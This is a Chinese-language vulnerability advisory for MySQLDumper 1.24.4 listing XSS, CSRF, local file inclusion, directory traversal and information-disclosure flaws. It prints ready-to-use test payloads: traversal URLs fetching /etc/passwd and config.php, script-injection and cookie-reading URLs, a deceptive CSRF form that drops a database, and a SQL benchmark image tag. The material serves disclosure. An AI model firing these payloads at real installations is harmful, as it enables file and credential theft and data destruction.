MySQLDumper多个安全漏洞

MySQLDumper多个安全漏洞

发布日期：2012-04-27
更新日期：2012-08-17

受影响系统：
MySQLDumper MySQLDumper 1.24.4
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53306

MySQLDumper是用PHP和Perl编写的MySQL数据库备份脚本。

MySQLDumper 1.24.4及其他版本在实现上存在多个安全漏洞，包括XSS、本地文件包含、跨站请求伪造、信息泄露、目录遍历漏洞，可允许攻击者获取敏感信息，执行任意脚本代码，窃取Cookie身份验证凭证，执行非法操作，查看和执行本地文件，检索任意文件。

<*来源：Akastep
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Akastep （）提供了如下测试方法：

Local File-inclusion:

http://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00

Cross-site scripting:

http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;

Cross-site request-forgery:

<img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" />
<form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
</form>

http://www.example.com/learn/cubemail/install.php?language=en&phase=101
http://www.example.com/learn/cubemail/install.php?language=en&phase=2

<img src="http://www.example.com/learn/cubemail/sql.php?sql_statement=select+benchmark%28100000000,md5%28now%28%29%29%29--" heigth="0" width="0" />

Directory-traversal:

http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00

Information disclosure

http://www.example.com/learn/cubemail/restore.php
http://www.example.com/learn/cubemail/dump.php
http://www.example.com/learn/cubemail/refresh_dblist.php

建议：
--------------------------------------------------------------------------------
厂商补丁：

MySQLDumper
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mysqldumper.de/